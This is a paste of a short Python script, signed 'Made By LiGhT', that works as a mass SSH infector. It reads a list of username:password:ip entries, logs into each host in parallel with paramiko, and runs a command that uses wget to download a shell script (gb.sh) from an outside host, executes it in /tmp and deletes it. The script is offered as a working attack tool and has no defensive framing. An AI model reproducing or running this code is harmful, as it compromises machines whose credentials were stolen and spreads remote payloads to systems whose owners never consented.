SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/python | |
2 | #Made By LiGhT | |
3 | ||
4 | import sys, re, os, paramiko | |
5 | from multiprocessing import Process | |
6 | ||
7 | if len(sys.argv) < 2: | |
8 | sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]") | |
9 | ||
10 | paramiko.util.log_to_file("/dev/null") | |
11 | cmd="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh" #command to send | |
12 | r34d = open(str(sys.argv[1]),'a+') | |
13 | print "\033[31mStarting Scan!\n" | |
14 | def w0rk(username,password,ip): | |
15 | try: | |
16 | port = 22 | |
17 | ssh = paramiko.SSHClient() | |
18 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
19 | ssh.connect(ip, port = port, username=username, password=password, timeout=3) | |
20 | print "\033[32m[\033[31m+\033[32m] Command Sent: "+ip+"\033[37m\n" | |
21 | ssh.exec_command(""+cmd+"") | |
22 | ssh.close() | |
23 | except: | |
24 | pass | |
25 | for line in r34d: | |
26 | ip_1nfo = line.split(":") | |
27 | g0d = Process(target=w0rk, args=(ip_1nfo[0],ip_1nfo[1],ip_1nfo[2],)) | |
28 | g0d.start() | |
29 | username=ip_1nfo[0] | |
30 | password=ip_1nfo[1] | |
31 | ip=ip_1nfo[2] | |
32 | g0d.join() |